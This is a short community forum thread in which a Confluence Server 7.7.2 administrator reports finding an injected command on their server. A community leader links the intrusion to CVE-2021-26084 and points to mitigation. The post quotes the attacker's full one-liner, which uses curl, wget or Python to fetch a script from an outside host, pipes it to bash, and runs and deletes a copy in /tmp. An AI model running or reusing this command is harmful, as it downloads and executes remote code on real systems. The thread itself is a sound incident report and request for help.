Forums

Articles
Create
cancel
Showing results for 
Search instead for 
Did you mean: 

Security issue

Alicja Mostowik
Contributor
September 2, 2021

Dear Confluence Team,

We have just revealed a security issue on our Confluence server - someone was able to place the below command in the code:

(confluence1) CMD ((curl -fsSL http://bash.givemexyz.in/xms||wget -q -O- http://bash.givemexyz.in/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("http://bash.givemexyz.in/xms").read()')| bash -sh; lwp-download http://bash.givemexyz.in/xms /tmp/xms; bash /tmp/xms; /tmp/xms; rm -rf /tmp/xms)

 

Could you please advise what is the possible way this has been introduced?

The Confluence Server version we run is 7.7.2.

I would be grateful for a prompt response.

Kind regards,

Alicja Mostowik

1 answer

1 accepted

1 vote
Answer accepted
Kishan Sharma
Community Leader
Community Leader
Community Leaders are connectors, ambassadors, and mentors. On the online community, they serve as thought leaders, product experts, and moderators.
September 2, 2021

Hi @Alicja Mostowik 

I can see your confluence version is affected by  CVE-2021-26084 - Confluence Server Webwork OGNL injection vulnerability. Please find the mitigation steps mentioned in the link.

Alicja Mostowik
Contributor
September 5, 2021

Thank you!

Like Kishan Sharma likes this

Suggest an answer

Log in or Sign up to answer
TAGS
atlassian, atlassian community, loom ai, atlassian loom ai, loom, atlassian ai, record recaps of meetings, meeting recaps, loom recaps, share meeting recaps,

Loom’s guide to great meetings 📹

Join us to learn how your team can stay fully engaged in meetings without worrying about writing everything down. Dive into Loom's newest feature, Loom AI for meetings, which automatically takes notes and tracks action items.

Register today!
AUG Leaders

Atlassian Community Events